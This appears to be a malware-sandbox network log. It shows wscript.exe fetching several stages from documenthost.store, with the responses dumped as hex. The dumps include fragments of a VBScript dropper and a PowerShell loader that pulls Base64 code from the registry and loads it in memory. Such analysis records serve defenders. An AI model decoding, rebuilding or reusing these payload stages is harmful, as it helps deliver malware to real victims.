                                                    2024-11-12 12:39:49 UTC1369INData Raw: 30 30 36 30 45 30 35 30 44 31 31 30 30 30 35 30 32 30 35 30 44 31 45 30 45 30 32 30 34 30 30 30 38 30 38 31 38 30 31 30 30 30 34 30 38 30 38 30 38 30 38 30 38 31 38 30 35 30 30 30 38 30 38 30 38 31 38 30 32 30 30 30 35 30 38 30 30 31 38 30 35 30 44 31 38 30 38 31 32 30 35 30 30 30 41 30 38 30 30 31 38 30 38 30 30 31 38 30 38 31 32 30 35 30 30 30 41 30 38 30 44 31 38 31 32 30 32 30 30 30 36 30 30 33 31 31 30 31 34 33 31 31 30 31 45 30 38 31 39 30 32 30 38 31 38 31 45 30 45 30 32 30 41 30 30 30 31 31 38 31 32 31 30 30 30 30 34 30 31 38 30 38 32 31 31 30 31 30 30 30 36 30 31 38 30 38 32 31 30 30 30 30 35 30 44 37 32 31 30 30 30 30 34 30 38 32 32 31 30 30 30 30 34 30 31 36 32 31 30 30 30 30 34 30 38 30 32 31 30 30 30 30 34 30 43 30 32 31 30 30 30 30 34 30 35
                                                    Data Ascii: 0060E050D11000502050D1E0E020400080818010004080808080818050008080818020005080018050D18081205000A080018080018081205000A080D18120200060031101431101E08190208181E0E020A00011812100004018082110100060180821000050D721000040822100004016210000408021000040C0210000405
                                                    2024-11-12 12:39:49 UTC1369INData Raw: 30 45 30 45 30 38 30 33 30 30 30 36 30 45 30 36 30 32 30 33 30 45 30 31 30 30 30 34 30 38 30 33 30 31 30 30 32 34 30 45 30 30 30 30 30 33 30 45 30 45 30 45 30 32 30 30 30 35 30 45 30 31 30 31 30 30 30 34 30 32 30 44 38 30 38 32 31 32 30 35 30 44 31 32 30 32 30 32 30 32 30 32 30 32 30 45 30 45 30 35 30 44 31 45 30 45 30 45 30 45 30 45 30 32 31 37 30 38 31 43 31 45 30 31 30 32 30 30 32 35 30 44 38 30 38 32 31 39 39 30 38 32 31 32 30 33 30 37 30 39 30 32 30 45 30 39 39 30 38 32 31 32 30 30 32 37 30 44 38 30 38 32 31 39 39 30 38 32 31 45 30 45 30 34 30 37 30 41 30 43 31 35 31 31 38 31 31 43 31 31 31 31 38 31 31 33 30 30 30 41 30 38 30 45 30 35 30 32 30 30 30 35 30 38 30 38 30 45 30 32 30 30 32 35 30 38 30 30 30 30 32 33 30 35 30 31 30 35 39 30 38 32 31 35 31
                                                    Data Ascii: 0E0E080300060E0602030E01000408030100240E0000030E0E0E0200050E01010004020D808212050D1202020202020E0E050D1E0E0E0E0E0217081C1E010200250D808219908212030709020E0990821200270D80821990821E0E04070A0C1511811C11118113000A080E0502000508080E020025080000230501059082151
                                                    2024-11-12 12:39:49 UTC1369INData Raw: 30 30 45 36 30 30 34 37 30 30 46 32 30 30 30 32 30 30 35 36 30 30 34 37 30 30 35 36 30 30 43 36 30 30 35 36 30 30 34 36 30 30 46 32 39 31 30 30 30 30 35 36 30 30 38 37 30 30 35 36 30 30 45 32 30 30 33 37 30 30 42 36 30 30 33 37 30 30 31 36 30 30 34 37 30 30 38 36 30 30 33 36 30 30 33 37 39 31 30 30 30 30 30 32 30 30 41 33 30 30 30 32 30 30 32 37 30 30 35 37 30 30 35 36 30 30 32 37 30 30 32 37 30 30 35 34 33 31 31 30 30 30 32 32 30 30 34 37 30 30 33 37 30 30 39 36 30 30 43 34 30 30 44 32 30 30 34 37 30 30 31 36 30 30 44 36 30 30 32 37 30 30 46 36 30 30 36 34 30 30 30 32 30 30 43 37 30 30 30 32 30 30 44 37 30 30 30 32 30 30 37 32 30 30 43 35 30 30 37 32 30 30 30 32 30 30 31 37 30 30 35 36 30 30 44 32 30 30 30 32 30 30 38 36 30 30 34 37 30 30 31 36 30 30 30
                                                    Data Ascii: 00E6004700F2000200560047005600C60056004600F2910000560087005600E2003700B60037001600470086003600379100000200A300020027005700560027002700543110002200470037009600C400D20047001600D6002700F60064000200C7000200D70002007200C5007200020017005600D20002008600470016000
                                                    2024-11-12 12:39:49 UTC1369INData Raw: 36 30 30 32 37 30 30 30 35 30 30 43 35 30 30 41 33 37 35 30 30 30 30 43 35 30 30 39 33 30 30 31 33 30 30 33 33 30 30 30 33 30 30 33 33 30 30 45 32 30 30 30 33 30 30 45 32 30 30 34 33 30 30 36 37 30 30 43 35 30 30 42 36 30 30 32 37 30 30 46 36 30 30 37 37 30 30 35 36 30 30 44 36 30 30 31 36 30 30 32 37 30 30 36 34 30 30 43 35 30 30 34 35 30 30 35 34 30 30 45 34 30 30 45 32 30 30 34 37 30 30 36 36 30 30 46 36 30 30 33 37 30 30 46 36 30 30 32 37 30 30 33 36 30 30 39 36 30 30 44 34 30 30 43 35 39 34 30 30 30 30 43 35 30 30 37 33 30 30 32 33 30 30 37 33 30 30 30 33 30 30 35 33 30 30 45 32 30 30 30 33 30 30 45 32 30 30 32 33 30 30 36 37 30 30 43 35 30 30 42 36 30 30 32 37 30 30 46 36 30 30 37 37 30 30 35 36 30 30 44 36 30 30 31 36 30 30 32 37 30 30 36 34 30 30
                                                    Data Ascii: 60027000500C500A3750000C50093001300330003003300E2000300E20043006700C500B6002700F60077005600D600160027006400C50045005400E400E20047006600F6003700F600270036009600D400C5940000C50073002300730003005300E2000300E20023006700C500B6002700F60077005600D600160027006400
                                                    2024-11-12 12:39:49 UTC1369INData Raw: 46 36 39 37 31 36 43 34 34 36 32 37 31 36 46 36 32 36 39 37 35 36 42 34 34 37 35 36 37 34 30 30 34 37 33 37 35 36 35 37 31 37 35 36 32 35 32 36 35 36 37 35 30 37 34 37 34 37 38 34 30 30 34 37 32 37 35 36 36 37 45 36 46 36 33 34 30 30 34 37 32 37 31 36 34 37 33 35 30 30 34 37 45 36 35 37 46 36 33 34 46 35 34 37 35 36 37 36 30 30 34 37 45 36 35 36 32 37 32 37 35 37 33 34 46 35 34 37 35 36 37 36 30 30 34 37 45 36 35 36 44 36 45 36 46 36 32 37 39 36 36 37 45 36 35 34 30 30 34 37 45 36 35 36 44 36 35 36 45 36 45 36 46 36 32 37 39 36 36 37 45 36 35 36 30 30 34 37 45 36 31 36 32 37 35 37 46 36 33 34 35 36 32 37 39 36 46 36 34 37 32 37 35 36 30 37 35 36 32 37 30 30 34 37 43 36 35 37 33 37 35 36 32 35 38 37 46 36 32 34 37 36 33 37 44 34 30 30 34 37 43 36 35 37 31
                                                    Data Ascii: F69716C4462716F6269756B44756740047375657175625265675074747840047275667E6F6340047271647350047E657F634F54756760047E65627275734F54756760047E656D6E6F6279667E6540047E656D656E6E6F6279667E6560047E6162757F634562796F64727560756270047C65737562587F6247637D40047C6571
                                                    2024-11-12 12:39:50 UTC1369INData Raw: 37 34 37 35 36 33 35 39 37 44 34 30 30 33 37 37 36 45 36 39 36 34 37 34 37 35 36 33 35 46 35 34 37 35 36 37 36 30 30 33 37 37 36 45 36 39 36 32 37 34 37 33 35 30 30 33 37 35 36 34 37 39 37 32 34 34 37 35 36 37 34 30 30 33 37 35 36 33 37 33 37 35 36 33 36 46 36 32 37 30 35 34 37 35 36 37 34 30 30 33 37 35 36 32 37 34 37 35 36 44 36 31 36 32 37 31 36 30 37 30 30 33 37 35 36 44 36 31 36 45 34 35 36 35 37 43 36 31 36 36 35 34 37 35 36 37 34 30 30 33 37 35 36 43 36 39 36 36 34 34 37 35 36 37 34 30 30 33 37 35 36 43 36 34 36 45 36 31 36 38 34 32 37 35 36 32 37 35 36 37 36 30 30 33 37 35 36 43 36 32 36 31 36 34 35 46 35 34 37 35 36 37 36 30 30 33 37 35 36 38 36 33 36 34 37 31 36 44 34 30 30 33 37 35 36 35 36 39 36 36 36 39 36 45 36 31 36 43 36 30 35 33 37 35 36
                                                    Data Ascii: 747563597D4003776E69647475635F5475676003776E69627473500375647972447567400375637375636F62705475674003756274756D616271607003756D616E45657C61665475674003756C69664475674003756C646E616842756275676003756C6261645F547567600375686364716D400375656966696E616C6053756


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.549706172.67.215.484437252C:\Windows\System32\wscript.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-12 12:39:50 UTC181OUTGET /2910/E93ukvxugzIRTSVJZUqI.txt HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: documenthost.store
                                                    2024-11-12 12:39:51 UTC847INHTTP/1.1 200 OK
                                                    Date: Tue, 12 Nov 2024 12:39:51 GMT
                                                    Content-Type: text/plain
                                                    Content-Length: 480256
                                                    Connection: close
                                                    Last-Modified: Thu, 31 Oct 2024 11:02:41 GMT
                                                    ETag: "75400-625c3c1d5c3c2"
                                                    Accept-Ranges: bytes
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pGCd1aDHdvYAbVl%2FlUJVnSwQDoJCgjxPoW1sAkP4obYo0bhv1Qenj1wJtQPxVnjvnVteCdn6Yyh%2FtDqGR1qThn1GSuO7lC2fgb1I9ZH%2F5Tk63aSTpiNPZWV0Tzo%2FAr9RUgUvXps%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8e16964f9ca8e7e7-DFW
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1350&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=795&delivery_rate=2080459&cwnd=251&unsent_bytes=0&cid=965ae457a2686eb2&ts=414&x=0"
                                                    2024-11-12 12:39:51 UTC522INData Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
                                                    Data Ascii: 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                                                    2024-11-12 12:39:51 UTC1369INData Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
                                                    Data Ascii: 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                                                    2024-11-12 12:39:51 UTC1369INData Raw: 32 34 37 36 36 46 36 33 37 46 36 32 37 33 36 39 36 44 36 44 32 33 37 31 36 44 36 35 36 38 36 33 36 33 37 41 33 45 36 32 37 35 37 32 32 44 33 33 37 45 36 43 36 44 36 38 37 30 32 46 36 36 36 45 36 39 34 34 37 33 37 35 37 32 37 34 37 43 33 30 32 30 32 41 30 44 30 45 33 46 32 32 32 30 37 30 37 31 36 45 32 45 36 46 36 39 36 34 37 31 36 33 36 39 36 43 36 30 37 30 37 31 34 39 37 44 34 32 32 44 33 35 36 44 36 31 36 45 36 30 32 32 32 30 33 45 32 30 33 45 32 30 33 45 32 31 33 32 32 44 33 45 36 46 36 39 36 33 37 32 37 35 36 36 37 30 32 39 37 34 37 39 36 34 37 45 36 35 36 34 36 39 34 39 37 43 36 32 36 44 36 35 36 33 37 33 37 31 36 43 33 30 32 30 32 41 30 44 30 45 33 32 32 30 33 45 32 31 33 32 32 44 33 45 36 46 36 39 36 33 37 32 37 35 36 36 35 34 37 33 37 35 36 36 36
                                                    Data Ascii: 24766F637F6273696D6D23716D656863637A3E6275722D337E6C6D68702F666E6944737572747C30202A0D0E3F222070716E2E6F69647163696C607071497D422D356D616E6022203E203E203E21322D3E6F696372756670297479647E656469497C626D656373716C30202A0D0E32203E21322D3E6F6963727566547375666
                                                    2024-11-12 12:39:51 UTC1369INData Raw: 30 30 30 30 30 30 45 36 30 30 46 36 30 30 39 36 30 30 34 37 30 30 30 37 30 30 39 36 30 30 32 37 30 30 33 36 30 30 33 37 30 30 35 36 30 30 34 34 30 30 35 36 30 30 43 36 30 30 39 36 30 30 36 34 30 30 31 30 30 30 32 30 30 30 43 32 30 30 30 30 30 30 30 33 30 30 32 36 30 30 34 33 30 30 30 33 30 30 30 33 30 30 30 33 30 30 30 33 30 30 30 33 30 30 31 30 30 30 30 30 31 30 38 46 30 30 30 30 30 30 46 36 30 30 36 36 30 30 45 36 30 30 39 34 30 30 35 36 30 30 43 36 30 30 39 36 30 30 36 34 30 30 37 36 30 30 45 36 30 30 39 36 30 30 32 37 30 30 34 37 30 30 33 35 30 30 31 30 30 30 30 30 32 30 43 31 34 30 30 42 30 30 30 30 30 30 30 30 30 30 30 30 30 30 45 36 30 30 46 36 30 30 39 36 30 30 34 37 30 30 31 36 30 30 43 36 30 30 33 37 30 30 45 36 30 30 31 36 30 30 32 37 30 30 34
                                                    Data Ascii: 000000E600F6009600470007009600270036003700560044005600C6009600640010002000C200000003002600430003000300030003000300100000108F000000F6006600E60094005600C600960064007600E600960027004700350010000020C1400B00000000000000E600F600960047001600C6003700E600160027004
                                                    2024-11-12 12:39:51 UTC1369INData Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 34 30 32 30 30 35 32 46 46 30 30 30 30 30 30 30 30 30 30 43 36 43 36 34 36 45 32 35 36 35 36 32 37 46 36 33 36 33 37 44 36 30 30 45 36 39 36 31 36 44 34 35 36 38 37 35 34 32 37 46 36 33 34 46 35 30 30 30 30 30 30 30 30 30 30 30 30 30 30 33 30 45 42 30 41 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 30 30 30 30 33 30 45 42 45 41 30 30 30 30 30 30 30 30 30 30 30 30
                                                    Data Ascii: 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004020052FF0000000000C6C646E2565627F63637D600E69616D456875427F634F50000000000000030EB0A0000000000000000000000000000000000000000000002000030EBEA000000000000
                                                    2024-11-12 12:39:51 UTC1369INData Raw: 30 32 42 30 35 45 32 38 31 31 39 30 33 38 31 31 39 30 33 38 31 31 31 30 33 30 30 32 43 30 31 46 32 38 32 31 36 30 34 30 44 45 32 38 32 31 44 31 30 30 30 32 36 30 35 30 33 38 32 31 39 46 32 38 32 31 31 30 30 30 38 30 41 30 31 46 32 38 32 31 31 30 32 30 30 32 37 30 38 30 38 30 31 30 32 30 30 32 35 30 44 46 32 38 31 31 30 30 30 32 35 30 31 30 33 38 32 31 30 30 30 30 35 30 35 38 30 38 32 31 30 30 30 30 35 30 38 30 44 46 32 38 31 31 44 46 32 38 31 31 44 46 32 38 31 31 44 46 32 38 31 31 39 31 32 31 39 31 32 31 39 46 32 38 32 31 35 46 32 38 32 31 31 38 30 38 32 31 31 46 32 38 32 31 44 45 32 38 32 31 39 45 32 38 32 31 35 45 32 38 31 31 45 30 37 30 38 32 38 30 38 30 44 31 32 31 35 30 44 31 34 30 37 30 38 30 43 31 32 30 31 30 30 30 34 30 44 41 32 38 32 31 30 30 30
                                                    Data Ascii: 02B05E2811903811903811103002C01F28216040DE2821D10002605038219F2821100080A01F282110200270808010200250DF281100025010382100005058082100005080DF2811DF2811DF2811DF2811912191219F28215F28211808211F2821DE28219E28215E2811E070828080D12150D1407080C120100040DA2821000
                                                    2024-11-12 12:39:51 UTC1369INData Raw: 30 44 31 35 30 44 31 35 42 31 38 32 31 35 30 44 31 35 30 44 31 44 46 31 38 32 31 38 30 37 30 33 31 33 30 35 30 31 30 30 30 34 30 38 30 35 30 44 31 35 30 44 31 35 30 44 31 35 30 44 31 39 37 32 38 32 31 38 30 38 30 35 30 44 31 35 30 44 31 35 30 44 31 39 36 32 38 32 31 35 30 44 31 35 37 32 38 32 31 45 30 37 30 45 31 44 30 38 30 31 30 30 30 34 30 38 30 35 30 44 31 35 30 44 31 35 30 44 31 35 30 44 31 35 30 44 31 35 30 44 31 35 30 44 31 35 30 44 31 38 30 38 30 38 30 38 30 35 30 44 31 38 30 38 30 38 30 38 30 45 30 31 32 31 31 35 30 44 31 38 30 36 31 37 30 33 32 38 30 35 30 44 31 39 30 32 30 30 30 36 30 38 30 43 33 31 38 32 31 43 33 31 38 32 31 45 30 45 30 35 30 44 31 38 30 45 30 38 30 38 30 38 30 38 30 45 30 38 30 39 30 38 30 45 30 31 31 37 30 38 31 44 36 32 31
                                                    Data Ascii: 0D150D15B182150D150D1DF182180703130501000408050D150D150D150D1972821808050D150D150D196282150D1572821E070E1D0801000408050D150D150D150D150D150D150D150D18080808050D180808080E0121150D1806170328050D19020006080C31821C31821E0E050D180E080808080E0809080E0117081D621
                                                    2024-11-12 12:39:51 UTC1369INData Raw: 38 30 39 35 32 38 32 31 35 30 31 30 44 34 32 31 35 31 31 31 37 30 41 31 38 30 33 30 44 31 33 30 44 31 33 30 44 31 38 30 45 30 44 31 38 30 45 30 45 30 39 30 37 30 46 30 30 30 45 31 31 30 41 30 34 30 43 31 45 30 31 30 30 32 34 30 38 30 35 35 32 38 32 31 32 30 37 30 36 30 35 33 45 34 36 33 44 41 36 35 38 33 46 42 31 33 38 30 45 30 44 31 45 30 45 30 32 30 30 30 36 30 30 37 32 31 31 30 31 45 30 38 31 31 35 31 37 30 38 30 30 37 32 31 31 30 31 45 30 38 31 31 35 31 30 37 32 31 33 30 37 30 43 30 30 37 32 31 31 30 44 34 32 31 35 31 36 30 38 30 38 30 45 30 44 31 43 33 31 38 32 31 45 30 45 30 35 30 44 31 35 30 44 31 34 37 31 38 32 31 45 30 35 30 44 31 35 30 44 31 34 37 31 38 32 31 45 30 45 30 45 30 38 30 43 36 31 38 32 31 34 35 31 38 32 31 35 30 44 31 45 30 45 30 43
                                                    Data Ascii: 809528215010D421511170A18030D130D130D180E0D180E0E09070F000E110A040C1E01002408055282120706053E463DA6583FB1380E0D1E0E02000600721101E08115170800721101E08115107213070C0072110D42151608080E0D1C31821E0E050D150D1471821E050D150D1471821E0E0E080C6182145182150D1E0E0C
                                                    2024-11-12 12:39:51 UTC1369INData Raw: 35 32 31 35 31 45 30 32 30 39 41 31 38 31 31 35 31 43 33 31 38 32 31 45 30 43 34 31 38 32 31 45 30 43 33 31 38 32 31 31 30 44 34 32 31 35 31 37 30 37 30 45 31 38 30 43 33 31 38 32 31 31 30 44 34 32 31 35 31 43 33 31 38 32 31 45 30 45 30 45 30 38 30 38 30 45 30 45 30 43 33 31 38 32 31 31 30 44 34 32 31 35 31 42 30 37 30 42 31 33 30 31 30 41 30 33 30 33 30 44 31 30 30 30 32 34 30 38 30 38 30 45 30 38 30 45 30 33 30 44 31 33 30 45 30 38 30 44 31 33 30 44 31 33 30 44 31 38 30 38 30 38 30 45 30 37 30 34 31 38 30 38 30 45 30 44 31 43 33 31 38 32 31 31 30 44 34 32 31 35 31 43 33 31 38 32 31 45 30 45 30 44 38 31 38 32 31 45 30 44 38 31 38 32 31 43 33 31 38 32 31 31 30 44 34 32 31 35 31 42 30 37 30 30 32 31 34 32 38 32 31 30 30 30 30 35 30 38 30 44 37 31 38 32 31
                                                    Data Ascii: 52151E0209A181151C31821E0C41821E0C3182110D421517070E180C3182110D42151C31821E0E0E08080E0E0C3182110D42151B070B13010A03030D10002408080E080E030D130E080D130D130D1808080E070418080E0D1C3182110D42151C31821E0E0D81821E0D81821C3182110D42151B0700214282100005080D71821
                                                    2024-11-12 12:39:51 UTC1369INData Raw: 45 30 43 33 31 38 32 31 31 30 44 34 32 31 35 31 39 30 37 30 36 32 38 30 44 36 31 38 32 31 44 36 31 38 32 31 31 30 33 30 30 30 41 30 38 30 45 30 44 46 31 38 32 31 35 30 44 31 39 42 31 38 32 31 44 46 31 38 32 31 35 30 44 31 35 30 44 31 35 30 44 31 35 30 44 31 35 30 44 31 44 31 32 38 32 31 35 30 44 31 44 30 37 30 45 31 38 30 38 30 45 30 33 30 45 30 45 30 36 30 37 30 38 30 35 30 38 30 31 30 30 30 34 30 38 30 43 33 31 38 32 31 38 30 45 30 44 31 35 30 44 31 35 30 44 31 38 30 38 30 35 30 44 31 45 30 43 33 31 38 32 31 31 30 44 34 32 31 35 31 45 30 43 30 37 30 41 31 38 30 38 30 38 30 44 31 38 30 38 30 44 31 38 30 44 31 38 30 44 31 38 30 38 30 44 31 38 30 38 30 38 30 38 30 44 31 38 30 44 31 45 30 46 30 37 30 38 31 38 30 38 30 35 30 44 31 38 30 33 30 30 32 37 30 41
                                                    Data Ascii: E0C3182110D4215190706280D61821D61821103000A080E0DF182150D19B1821DF182150D150D150D150D150D1D1282150D1D070E18080E030E0E0607080508010004080C3182180E0D150D150D1808050D1E0C3182110D42151E0C070A1808080D18080D180D180D18080D180808080D180D1E0F07081808050D180300270A


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.549709172.67.215.484437252C:\Windows\System32\wscript.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-12 12:40:04 UTC158OUTGET /2910/v HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: documenthost.store
                                                    2024-11-12 12:40:05 UTC821INHTTP/1.1 200 OK
                                                    Date: Tue, 12 Nov 2024 12:40:04 GMT
                                                    Content-Length: 478
                                                    Connection: close
                                                    Last-Modified: Wed, 25 Sep 2024 15:44:42 GMT
                                                    ETag: "1de-622f3802a248c"
                                                    Accept-Ranges: bytes
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fveBKXhfrOdlFl1ytTftv5hYfgGS%2Fr%2B%2Bi%2F0YD4LFiGdEH2cHvgUaLafuOFNb4LRP%2FwpARcN55%2FjQ8hNVAsLquZj3x9Ib9RvoNoUCabrht34on7%2Btg5StwApp1AWjparNmjXsx8k%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8e1696a558ffb798-DFW
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1185&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=772&delivery_rate=2399337&cwnd=80&unsent_bytes=0&cid=8ebb8220f5082799&ts=404&x=0"
                                                    2024-11-12 12:40:05 UTC478INData Raw: 37 42 35 42 37 44 34 31 37 30 37 30 34 34 36 46 36 44 36 31 36 39 36 45 37 42 35 44 37 44 33 41 33 41 34 33 37 35 37 32 37 32 36 35 36 45 37 34 34 34 36 46 36 44 36 31 36 39 36 45 32 45 34 43 36 46 36 31 36 34 37 42 32 38 37 44 35 42 34 33 36 46 36 45 37 36 36 35 37 32 37 34 37 42 35 44 37 44 33 41 33 41 34 36 37 32 36 46 36 44 34 32 36 31 37 33 36 35 33 36 33 34 35 33 37 34 37 32 36 39 36 45 36 37 37 42 32 38 37 44 37 42 32 38 37 44 32 44 36 41 36 46 36 39 36 45 32 30 37 42 32 38 37 44 34 37 36 35 37 34 32 44 34 39 37 34 36 35 36 44 35 30 37 32 36 46 37 30 36 35 37 32 37 34 37 39 32 30 32 44 34 43 36 39 37 34 36 35 37 32 36 31 36 43 35 30 36 31 37 34 36 38 32 30 32 37 34 38 34 42 34 33 35 35 33 41 35 43 35 33 36 46 36 36 37 34 37 37 36 31 37 32 36 35 35
                                                    Data Ascii: 7B5B7D417070446F6D61696E7B5D7D3A3A43757272656E74446F6D61696E2E4C6F61647B287D5B436F6E766572747B5D7D3A3A46726F6D426173653634537472696E677B287D7B287D2D6A6F696E207B287D4765742D4974656D50726F7065727479202D4C69746572616C506174682027484B43553A5C536F6674776172655


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.549712172.67.215.484437252C:\Windows\System32\wscript.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-12 12:40:05 UTC161OUTGET /2910/file HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: documenthost.store
                                                    2024-11-12 12:40:06 UTC821INHTTP/1.1 200 OK
                                                    Date: Tue, 12 Nov 2024 12:40:06 GMT
                                                    Content-Length: 3952
                                                    Connection: close
                                                    Last-Modified: Sun, 03 Nov 2024 03:20:50 GMT
                                                    ETag: "f70-625f9a7aaa0ed"
                                                    Accept-Ranges: bytes
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kpTs4zzg3K%2BzWRwZa3Kc5egVWmnGbW6WVGWNkPQzKo%2BffO7Jtf4biMOhTc1qK8GPf6UP%2BTzQgWt%2B%2BWxCn%2BrNMwKGLKrVeEqXfttC0oZ9sVslMPHCGk5pkAsYRtdYhTF6SSE1EyU%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8e1696adcd65e599-DFW
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1207&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=775&delivery_rate=2331723&cwnd=251&unsent_bytes=0&cid=3dc4d86ffaee12d5&ts=458&x=0"
                                                    2024-11-12 12:40:06 UTC548INData Raw: 34 46 37 30 37 34 36 39 36 46 36 45 32 30 34 35 37 38 37 30 36 43 36 39 36 33 36 39 37 34 30 41 30 41 32 37 32 30 34 45 36 46 36 44 36 32 37 32 36 35 32 30 36 34 36 35 36 43 32 30 37 30 37 32 36 46 37 39 36 35 36 33 37 34 36 46 33 41 32 30 37 43 37 30 36 31 37 34 36 38 37 43 30 41 32 37 32 30 35 36 36 31 37 32 36 39 36 31 36 32 36 43 36 35 37 33 32 30 36 37 36 43 36 46 36 32 36 31 36 43 36 35 37 33 30 41 34 34 36 39 36 44 32 30 35 33 35 33 34 38 32 43 32 30 35 32 35 37 34 34 32 43 32 30 34 33 34 32 34 43 30 41 35 33 36 35 37 34 32 30 35 33 35 33 34 38 32 30 33 44 32 30 34 33 37 32 36 35 36 31 37 34 36 35 34 46 36 32 36 41 36 35 36 33 37 34 32 38 32 32 35 37 35 33 36 33 37 32 36 39 37 30 37 34 32 45 35 33 36 38 36 35 36 43 36 43 32 32 32 39 30 41 35 32 35
                                                    Data Ascii: 4F7074696F6E204578706C696369740A0A27204E6F6D6272652064656C2070726F796563746F3A207C706174687C0A27205661726961626C657320676C6F62616C65730A44696D205353482C205257442C2043424C0A53657420535348203D204372656174654F626A6563742822575363726970742E5368656C6C22290A525
